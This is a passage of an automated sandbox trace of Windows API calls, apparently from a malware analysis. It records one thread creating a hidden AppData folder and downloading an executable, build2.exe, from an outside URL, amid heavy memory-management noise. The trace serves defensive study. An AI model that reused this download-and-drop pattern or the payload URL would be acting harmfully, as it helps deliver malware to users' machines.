HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c0fe98 | out: hHeap=0x5f0000) returned 1 [0115.095] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c106e0 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf23b0 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c10f28 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c11760 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b8d670 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b8def8 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b8e780 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c127c8 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c13838 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b8f008 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c148c0 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c15118 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b8f890 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b90118 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c14070 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c161b0 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c17240 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b91228 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b91ab0 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b92338 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b909a0 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b92bc0 | out: hHeap=0x5f0000) returned 1 [0115.096] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b9e6c8 | out: hHeap=0x5f0000) returned 1 [0115.097] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b9ef50 | out: hHeap=0x5f0000) returned 1 [0115.097] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba0060 | out: hHeap=0x5f0000) returned 1 [0115.097] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b9f7d8 | out: hHeap=0x5f0000) returned 1 [0115.097] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c18bb0 | out: hHeap=0x5f0000) returned 1 [0115.097] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c19408 | out: hHeap=0x5f0000) returned 1 [0115.097] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba08e8 | out: hHeap=0x5f0000) returned 1 [0115.097] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba1170 | out: hHeap=0x5f0000) returned 1 [0115.097] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba2280 | out: hHeap=0x5f0000) returned 1 [0115.097] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c169f8 | out: hHeap=0x5f0000) returned 1 [0115.097] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba2b08 | out: hHeap=0x5f0000) returned 1 [0115.097] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba3390 | out: hHeap=0x5f0000) returned 1 [0115.097] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba3c18 | out: hHeap=0x5f0000) returned 1 [0115.097] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba19f8 | out: hHeap=0x5f0000) returned 1 [0115.097] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba44a0 | out: hHeap=0x5f0000) returned 1 [0115.097] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c17a88 | out: hHeap=0x5f0000) returned 1 [0115.098] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf1b98 | out: hHeap=0x5f0000) returned 1 [0115.098] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b98b40 | out: hHeap=0x5f0000) returned 1 [0115.098] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf2c08 | out: hHeap=0x5f0000) returned 1 [0115.098] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf6498 | out: hHeap=0x5f0000) returned 1 [0115.099] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6d2b0 | out: hHeap=0x5f0000) returned 1 [0115.099] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x62c290 | out: hHeap=0x5f0000) returned 1 [0115.099] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba73d8 | out: hHeap=0x5f0000) returned 1 [0115.099] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c33638 | out: hHeap=0x5f0000) returned 1 [0115.100] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c33ec0 | out: hHeap=0x5f0000) returned 1 [0115.100] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c34748 | out: hHeap=0x5f0000) returned 1 [0115.100] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c34fd0 | out: hHeap=0x5f0000) returned 1 [0115.100] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b98c78 | out: hHeap=0x5f0000) returned 1 [0115.101] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c32528 | out: hHeap=0x5f0000) returned 1 [0115.101] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c15970 | out: hHeap=0x5f0000) returned 1 [0115.101] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2beeb30 | out: hHeap=0x5f0000) returned 1 [0115.101] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bef348 | out: hHeap=0x5f0000) returned 1 [0115.102] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c3ada0 | out: hHeap=0x5f0000) returned 1 [0115.102] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c3b5b8 | out: hHeap=0x5f0000) returned 1 [0115.102] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c3bdd0 | out: hHeap=0x5f0000) returned 1 [0115.102] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c32db0 | out: hHeap=0x5f0000) returned 1 [0115.103] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b896a0 | out: hHeap=0x5f0000) returned 1 [0115.103] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bb6888 | out: hHeap=0x5f0000) returned 1 [0115.103] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bb7110 | out: hHeap=0x5f0000) returned 1 [0115.104] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bb7998 | out: hHeap=0x5f0000) returned 1 [0115.104] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bb8220 | out: hHeap=0x5f0000) returned 1 [0115.104] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bb8aa8 | out: hHeap=0x5f0000) returned 1 [0115.104] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c18360 | out: hHeap=0x5f0000) returned 1 [0115.104] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bb9330 | out: hHeap=0x5f0000) returned 1 [0115.105] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bb9bb8 | out: hHeap=0x5f0000) returned 1 [0115.105] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c1a558 | out: hHeap=0x5f0000) returned 1 [0115.105] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bfcf88 | out: hHeap=0x5f0000) returned 1 [0115.105] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bfd7e0 | out: hHeap=0x5f0000) returned 1 [0115.106] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bba440 | out: hHeap=0x5f0000) returned 1 [0115.106] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bbacc8 | out: hHeap=0x5f0000) returned 1 [0115.106] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be8fb8 | out: hHeap=0x5f0000) returned 1 [0115.107] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be9800 | out: hHeap=0x5f0000) returned 1 [0115.107] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bbb550 | out: hHeap=0x5f0000) returned 1 [0115.107] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c1adb8 | out: hHeap=0x5f0000) returned 1 [0115.107] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c1b640 | out: hHeap=0x5f0000) returned 1 [0115.108] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c1bec8 | out: hHeap=0x5f0000) returned 1 [0115.108] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c1c750 | out: hHeap=0x5f0000) returned 1 [0115.108] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c1cfd8 | out: hHeap=0x5f0000) returned 1 [0115.108] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c1d860 | out: hHeap=0x5f0000) returned 1 [0115.109] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c1e0e8 | out: hHeap=0x5f0000) returned 1 [0115.109] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c1e970 | out: hHeap=0x5f0000) returned 1 [0115.109] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c1f1f8 | out: hHeap=0x5f0000) returned 1 [0115.110] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bea048 | out: hHeap=0x5f0000) returned 1 [0115.110] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bea8a0 | out: hHeap=0x5f0000) returned 1 [0115.110] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c1fa80 | out: hHeap=0x5f0000) returned 1 [0115.110] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c20308 | out: hHeap=0x5f0000) returned 1 [0115.110] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c20b90 | out: hHeap=0x5f0000) returned 1 [0115.111] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2beb0f8 | out: hHeap=0x5f0000) returned 1 [0115.111] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2beb940 | out: hHeap=0x5f0000) returned 1 [0115.111] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c21418 | out: hHeap=0x5f0000) returned 1 [0115.113] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c21ca0 | out: hHeap=0x5f0000) returned 1 [0115.113] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c22528 | out: hHeap=0x5f0000) returned 1 [0115.113] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c22db0 | out: hHeap=0x5f0000) returned 1 [0115.113] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c23638 | out: hHeap=0x5f0000) returned 1 [0115.114] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c23ec0 | out: hHeap=0x5f0000) returned 1 [0115.114] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c24748 | out: hHeap=0x5f0000) returned 1 [0115.114] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c24fd0 | out: hHeap=0x5f0000) returned 1 [0115.114] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c25858 | out: hHeap=0x5f0000) returned 1 [0115.115] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bec188 | out: hHeap=0x5f0000) returned 1 [0115.115] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bec9e0 | out: hHeap=0x5f0000) returned 1 [0115.115] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c260e0 | out: hHeap=0x5f0000) returned 1 [0115.116] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c26968 | out: hHeap=0x5f0000) returned 1 [0115.116] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c271f0 | out: hHeap=0x5f0000) returned 1 [0115.116] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bed238 | out: hHeap=0x5f0000) returned 1 [0115.117] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c27a78 | out: hHeap=0x5f0000) returned 1 [0115.117] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c28300 | out: hHeap=0x5f0000) returned 1 [0115.117] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c28b88 | out: hHeap=0x5f0000) returned 1 [0115.118] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c29410 | out: hHeap=0x5f0000) returned 1 [0115.118] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c29c98 | out: hHeap=0x5f0000) returned 1 [0115.118] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c2adb8 | out: hHeap=0x5f0000) returned 1 [0115.119] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c2b640 | out: hHeap=0x5f0000) returned 1 [0115.119] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c2bec8 | out: hHeap=0x5f0000) returned 1 [0115.119] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c2c750 | out: hHeap=0x5f0000) returned 1 [0115.120] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c2cfd8 | out: hHeap=0x5f0000) returned 1 [0115.120] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2beda80 | out: hHeap=0x5f0000) returned 1 [0115.120] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bee2d8 | out: hHeap=0x5f0000) returned 1 [0115.120] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c2d860 | out: hHeap=0x5f0000) returned 1 [0115.121] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c2e0e8 | out: hHeap=0x5f0000) returned 1 [0115.121] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c2e970 | out: hHeap=0x5f0000) returned 1 [0115.121] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c2f1f8 | out: hHeap=0x5f0000) returned 1 [0115.121] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c2fa80 | out: hHeap=0x5f0000) returned 1 [0115.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c30308 | out: hHeap=0x5f0000) returned 1 [0115.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c30b90 | out: hHeap=0x5f0000) returned 1 [0115.123] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c31418 | out: hHeap=0x5f0000) returned 1 [0115.123] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c31ca0 | out: hHeap=0x5f0000) returned 1 [0115.123] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf56e8 | out: hHeap=0x5f0000) returned 1 [0115.124] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c13000 | out: hHeap=0x5f0000) returned 1 [0115.124] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b98ad8 | out: hHeap=0x5f0000) returned 1 [0115.124] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bfbf10 | out: hHeap=0x5f0000) returned 1 [0115.124] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bb6000 | out: hHeap=0x5f0000) returned 1 [0115.125] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c11f98 | out: hHeap=0x5f0000) returned 1 [0115.125] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2c19c60 | out: hHeap=0x5f0000) returned 1 [0115.125] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611a78 | out: hHeap=0x5f0000) returned 1 [0115.127] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x610718 | out: hHeap=0x5f0000) returned 1 [0115.127] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0115.128] ExitProcess (uExitCode=0x0) [0115.128] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6d078 | out: hHeap=0x5f0000) returned 1 [0115.128] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60f228 | out: hHeap=0x5f0000) returned 1 Thread: id = 68 os_tid = 0xf34 Thread: id = 69 os_tid = 0xf38 Thread: id = 70 os_tid = 0xf3c Thread: id = 71 os_tid = 0xf40 Thread: id = 72 os_tid = 0xf44 Thread: id = 73 os_tid = 0xf48 Thread: id = 74 os_tid = 0xf4c [0099.225] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x50) returned 0x2ba71c8 [0099.288] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x50) returned 0x2ba7278 [0099.304] GetLastError () returned 0x54f [0099.356] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x3bc) returned 0x2be71a0 [0099.384] GetCurrentThreadId () returned 0xf4c [0099.384] SetLastError (dwErrCode=0x54f) [0099.411] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x2b6afe8 [0099.412] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x2b845c8 [0099.420] GetLastError () returned 0x54f [0099.420] SetLastError (dwErrCode=0x54f) [0099.420] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x2b6afb0 [0099.420] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x2b6af08 [0099.420] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b845c8 | out: hHeap=0x5f0000) returned 1 [0099.420] GetLastError () returned 0x54f [0099.420] SetLastError (dwErrCode=0x54f) [0099.421] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba7278 | out: hHeap=0x5f0000) returned 1 [0099.421] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75be0000 [0099.657] GetProcAddress (hModule=0x75be0000, lpProcName="SHGetFolderPathA") returned 0x75cf7804 [0099.657] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x400) returned 0x2be7568 [0099.657] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x2be7568 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0099.658] UuidCreate (in: Uuid=0x915d768 | out: Uuid=0x915d768) returned 0x0 [0099.659] UuidToStringA (in: Uuid=0x915d768, StringUuid=0x915d6c0 | out: StringUuid=0x915d6c0) returned 0x0 [0099.659] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x2b6b020 [0099.659] RpcStringFreeA (in: String=0x915d6c0 | out: String=0x915d6c0) returned 0x0 [0099.659] PathAppendA (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local", pMore="c01688bb-f556-4db2-ba2c-05b15fa562c3" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\c01688bb-f556-4db2-ba2c-05b15fa562c3") returned 1 [0099.660] CreateDirectoryA (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\c01688bb-f556-4db2-ba2c-05b15fa562c3" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\c01688bb-f556-4db2-ba2c-05b15fa562c3"), lpSecurityAttributes=0x0) returned 1 [0099.671] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x410) returned 0x2be7970 [0099.671] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x410) returned 0x2be7d88 [0099.681] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1000) returned 0x2bf3e48 [0099.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2be7d88, cbMultiByte=-1, lpWideCharStr=0x2bf3e48, cchWideChar=2048 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\c01688bb-f556-4db2-ba2c-05b15fa562c3") returned 70 [0099.681] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1010) returned 0x2bf4e50 [0099.682] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf3e48 | out: hHeap=0x5f0000) returned 1 [0099.682] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be7d88 | out: hHeap=0x5f0000) returned 1 [0099.683] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x2b845c8 [0099.683] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0099.683] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x2b6b058 [0099.683] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x844) returned 0x2be7d88 [0099.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b6b058, cbMultiByte=-1, lpWideCharStr=0x2be7d88, cchWideChar=1058 | out: lpWideCharStr="http://rgyui.top/dl/build2.exe") returned 31 [0099.683] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x850) returned 0x2bf3e48 [0099.684] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be7d88 | out: hHeap=0x5f0000) returned 1 [0099.684] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6b058 | out: hHeap=0x5f0000) returned 1 [0099.693] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x850) returned 0x2be7d88 [0099.693] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x822) returned 0x2bf5e68 [0099.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://rgyui.top/dl/build2.exe", cchWideChar=-1, lpMultiByteStr=0x2bf5e68, cbMultiByte=2082, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://rgyui.top/dl/build2.exe", lpUsedDefaultChar=0x0) returned 31 [0099.694] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x830) returned 0x2bf6698 [0099.694] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf5e68 | out: hHeap=0x5f0000) returned 1 [0099.694] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be7d88 | out: hHeap=0x5f0000) returned 1 [0099.694] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://rgyui.top/dl/build2.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0102.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf6698 | out: hHeap=0x5f0000) returned 1 [0102.428] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x915d6d0, lpdwBufferLength=0x915d710, lpdwIndex=0x0 | out: lpBuffer=0x915d6d0*, lpdwBufferLength=0x915d710*=0x4, lpdwIndex=0x0) returned 1 [0102.428] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x2b6ad80 [0102.428] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6ad80 | out: hHeap=0x5f0000) returned 1 [0102.428] lstrcpyA (in: lpString1=0x2be7568, lpString2="C:\\Users\\kEecfMwgj\\AppData\\Local\\c01688bb-f556-4db2-ba2c-05b15fa562c3" | out: lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\c01688bb-f556-4db2-ba2c-05b15fa562c3") returned="C:\\Users\\kEecfMwgj\\AppData\\Local\\c01688bb-f556-4db2-ba2c-05b15fa562c3" [0102.428] PathAppendA (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\c01688bb-f556-4db2-ba2c-05b15fa562c3", pMore="build2.exe" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\c01688bb-f556-4db2-ba2c-05b15fa562c3\\build2.exe") returned 1 [0102.429] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x60) returned 0x2b98ba8 [0102.429] CreateFileA (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\c01688bb-f556-4db2-ba2c-05b15fa562c3\\build2.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\c01688bb-f556-4db2-ba2c-05b15fa562c3\\build2.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a4 [0102.429] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.429] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0105.531] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0105.532] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0106.090] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.090] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0106.371] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.372] 